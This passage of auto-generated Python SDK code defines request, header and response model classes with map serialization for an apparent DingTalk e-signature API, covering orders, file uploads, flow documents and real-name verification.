self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCorpConsoleResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFileInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFileInfoResponseBody(TeaModel):
def __init__(
self,
file_id: str = None,
name: str = None,
download_url: str = None,
size: int = None,
status: int = None,
pdf_total_pages: int = None,
):
self.file_id = file_id
self.name = name
self.download_url = download_url
self.size = size
self.status = status
self.pdf_total_pages = pdf_total_pages
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.name is not None:
result['name'] = self.name
if self.download_url is not None:
result['downloadUrl'] = self.download_url
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.pdf_total_pages is not None:
result['pdfTotalPages'] = self.pdf_total_pages
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('downloadUrl') is not None:
self.download_url = m.get('downloadUrl')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('pdfTotalPages') is not None:
self.pdf_total_pages = m.get('pdfTotalPages')
return self
class GetFileInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFileInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFileInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ChannelOrdersHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ChannelOrdersRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
order_id: str = None,
item_code: str = None,
item_name: str = None,
quantity: float = None,
pay_fee: float = None,
order_create_time: float = None,
):
self.ding_corp_id = ding_corp_id
# isv方的订单Id(用于幂等,请保证唯一性)
self.order_id = order_id
# 商品id
self.item_code = item_code
# 商品名称
self.item_name = item_name
# 购买数量
self.quantity = quantity
# 支付金额(以分为单位,仅作记录,不作为凭证)
self.pay_fee = pay_fee
# 下单时间
self.order_create_time = order_create_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.order_id is not None:
result['orderId'] = self.order_id
if self.item_code is not None:
result['itemCode'] = self.item_code
if self.item_name is not None:
result['itemName'] = self.item_name
if self.quantity is not None:
result['quantity'] = self.quantity
if self.pay_fee is not None:
result['payFee'] = self.pay_fee
if self.order_create_time is not None:
result['orderCreateTime'] = self.order_create_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('orderId') is not None:
self.order_id = m.get('orderId')
if m.get('itemCode') is not None:
self.item_code = m.get('itemCode')
if m.get('itemName') is not None:
self.item_name = m.get('itemName')
if m.get('quantity') is not None:
self.quantity = m.get('quantity')
if m.get('payFee') is not None:
self.pay_fee = m.get('payFee')
if m.get('orderCreateTime') is not None:
self.order_create_time = m.get('orderCreateTime')
return self
class ChannelOrdersResponseBody(TeaModel):
def __init__(
self,
esign_order_id: str = None,
):
self.esign_order_id = esign_order_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.esign_order_id is not None:
result['esignOrderId'] = self.esign_order_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('esignOrderId') is not None:
self.esign_order_id = m.get('esignOrderId')
return self
class ChannelOrdersResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ChannelOrdersResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ChannelOrdersResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ResaleOrderHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ResaleOrderRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
order_id: str = None,
quantity: float = None,
order_create_time: float = None,
service_start_time: float = None,
service_stop_time: float = None,
):
self.ding_corp_id = ding_corp_id
# isv方的订单Id(用于幂等,请保证唯一性)
self.order_id = order_id
# 购买数量(电子合同份数)
self.quantity = quantity
# 下单时间
self.order_create_time = order_create_time
# 合同生效起始时间
self.service_start_time = service_start_time
# 合同失效截止日期,默认有效时间一年
self.service_stop_time = service_stop_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.order_id is not None:
result['orderId'] = self.order_id
if self.quantity is not None:
result['quantity'] = self.quantity
if self.order_create_time is not None:
result['orderCreateTime'] = self.order_create_time
if self.service_start_time is not None:
result['serviceStartTime'] = self.service_start_time
if self.service_stop_time is not None:
result['serviceStopTime'] = self.service_stop_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('orderId') is not None:
self.order_id = m.get('orderId')
if m.get('quantity') is not None:
self.quantity = m.get('quantity')
if m.get('orderCreateTime') is not None:
self.order_create_time = m.get('orderCreateTime')
if m.get('serviceStartTime') is not None:
self.service_start_time = m.get('serviceStartTime')
if m.get('serviceStopTime') is not None:
self.service_stop_time = m.get('serviceStopTime')
return self
class ResaleOrderResponseBody(TeaModel):
def __init__(
self,
esign_order_id: str = None,
):
self.esign_order_id = esign_order_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.esign_order_id is not None:
result['esignOrderId'] = self.esign_order_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('esignOrderId') is not None:
self.esign_order_id = m.get('esignOrderId')
return self
class ResaleOrderResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ResaleOrderResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ResaleOrderResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class CancelCorpAuthHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class CancelCorpAuthRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
):
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class CancelCorpAuthResponseBody(TeaModel):
def __init__(
self,
result: bool = None,
):
self.result = result
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.result is not None:
result['result'] = self.result
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('result') is not None:
self.result = m.get('result')
return self
class CancelCorpAuthResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CancelCorpAuthResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CancelCorpAuthResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFileUploadUrlHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFileUploadUrlRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
content_md_5: str = None,
content_type: str = None,
file_name: str = None,
file_size: int = None,
convert_2pdf: bool = None,
):
self.ding_corp_id = ding_corp_id
self.content_md_5 = content_md_5
self.content_type = content_type
self.file_name = file_name
self.file_size = file_size
self.convert_2pdf = convert_2pdf
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.content_md_5 is not None:
result['contentMd5'] = self.content_md_5
if self.content_type is not None:
result['contentType'] = self.content_type
if self.file_name is not None:
result['fileName'] = self.file_name
if self.file_size is not None:
result['fileSize'] = self.file_size
if self.convert_2pdf is not None:
result['convert2Pdf'] = self.convert_2pdf
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('contentMd5') is not None:
self.content_md_5 = m.get('contentMd5')
if m.get('contentType') is not None:
self.content_type = m.get('contentType')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
if m.get('fileSize') is not None:
self.file_size = m.get('fileSize')
if m.get('convert2Pdf') is not None:
self.convert_2pdf = m.get('convert2Pdf')
return self
class GetFileUploadUrlResponseBody(TeaModel):
def __init__(
self,
file_id: str = None,
upload_url: str = None,
):
self.file_id = file_id
self.upload_url = upload_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.upload_url is not None:
result['uploadUrl'] = self.upload_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('uploadUrl') is not None:
self.upload_url = m.get('uploadUrl')
return self
class GetFileUploadUrlResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFileUploadUrlResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFileUploadUrlResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetIsvStatusHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetIsvStatusResponseBody(TeaModel):
def __init__(
self,
install_status: str = None,
auth_status: str = None,
):
self.install_status = install_status
self.auth_status = auth_status
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.install_status is not None:
result['installStatus'] = self.install_status
if self.auth_status is not None:
result['authStatus'] = self.auth_status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('installStatus') is not None:
self.install_status = m.get('installStatus')
if m.get('authStatus') is not None:
self.auth_status = m.get('authStatus')
return self
class GetIsvStatusResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetIsvStatusResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetIsvStatusResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFlowDocsHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFlowDocsResponseBodyData(TeaModel):
def __init__(
self,
file_id: str = None,
file_name: str = None,
file_url: str = None,
):
self.file_id = file_id
self.file_name = file_name
self.file_url = file_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.file_name is not None:
result['fileName'] = self.file_name
if self.file_url is not None:
result['fileUrl'] = self.file_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
if m.get('fileUrl') is not None:
self.file_url = m.get('fileUrl')
return self
class GetFlowDocsResponseBody(TeaModel):
def __init__(
self,
data: List[GetFlowDocsResponseBodyData] = None,
):
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetFlowDocsResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetFlowDocsResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFlowDocsResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFlowDocsResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class UsersRealnameHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UsersRealnameRequest(TeaModel):
def __init__(
self,
user_id: str = None,
redirect_url: str = None,
ding_corp_id: str = None,
):
self.user_id = user_id
self.redirect_url = redirect_url
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.user_id is not None:
result['userId'] = self.user_id
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UsersRealnameResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class UsersRealnameResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UsersRealnameResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UsersRealnameResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFlowDetailHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFlowDetailResponseBodyLogs(TeaModel):
def __init__(
self,
operator_account_name: str = None,
log_type: str = None,
operate_description: str = None,
operate_time: float = None,
):
self.operator_account_name = operator_account_name
self.log_type = log_type
self.operate_description = operate_description
self.operate_time = operate_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.operator_account_name is not None:
result['operatorAccountName'] = self.operator_account_name
if self.log_type is not None:
result['logType'] = self.log_type
if self.operate_description is not None:
result['operateDescription'] = self.operate_description
if self.operate_time is not None:
result['operateTime'] = self.operate_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('operatorAccountName') is not None:
self.operator_account_name = m.get('operatorAccountName')
if m.get('logType') is not None:
self.log_type = m.get('logType')
if m.get('operateDescription') is not None:
self.operate_description = m.get('operateDescription')
if m.get('operateTime') is not None:
self.operate_time = m.get('operateTime')
return self
class GetFlowDetailResponseBody(TeaModel):
def __init__(
self,
business_scene: str = None,
flow_status: float = None,
initiator_authorized_name: str = None,
initiator_name: str = None,
logs: List[GetFlowDetailResponseBodyLogs] = None,
):
self.business_scene = business_scene
self.flow_status = flow_status
self.initiator_authorized_name = initiator_authorized_name
self.initiator_name = initiator_name
self.logs = logs
def validate(self):
if self.logs:
for k in self.logs:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.business_scene is not None:
result['businessScene'] = self.business_scene
if self.flow_status is not None:
result['flowStatus'] = self.flow_status
if self.initiator_authorized_name is not None:
result['initiatorAuthorizedName'] = self.initiator_authorized_name
if self.initiator_name is not None:
result['initiatorName'] = self.initiator_name
result['logs'] = []
if self.logs is not None:
for k in self.logs:
result['logs'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('businessScene') is not None:
self.business_scene = m.get('businessScene')
if m.get('flowStatus') is not None:
self.flow_status = m.get('flowStatus')
if m.get('initiatorAuthorizedName') is not None:
self.initiator_authorized_name = m.get('initiatorAuthorizedName')
if m.get('initiatorName') is not None:
self.initiator_name = m.get('initiatorName')
self.logs = []
if m.get('logs') is not None:
for k in m.get('logs'):
temp_model = GetFlowDetailResponseBodyLogs()
self.logs.append(temp_model.from_map(k))
return self
class GetFlowDetailResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFlowDetailResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetFlowDetailResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCorpInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCorpInfoResponseBody(TeaModel):
def __init__(
self,
is_real_name: str = None,
org_real_name: str = None,
):
self.is_real_name = is_real_name
self.org_real_name = org_real_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.is_real_name is not None:
result['isRealName'] = self.is_real_name
if self.org_real_name is not None:
result['orgRealName'] = self.org_real_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('isRealName') is not None:
self.is_real_name = m.get('isRealName')
if m.get('orgRealName') is not None:
self.org_real_name = m.get('orgRealName')
return self
class GetCorpInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCorpInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCorpInfoResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetUserInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
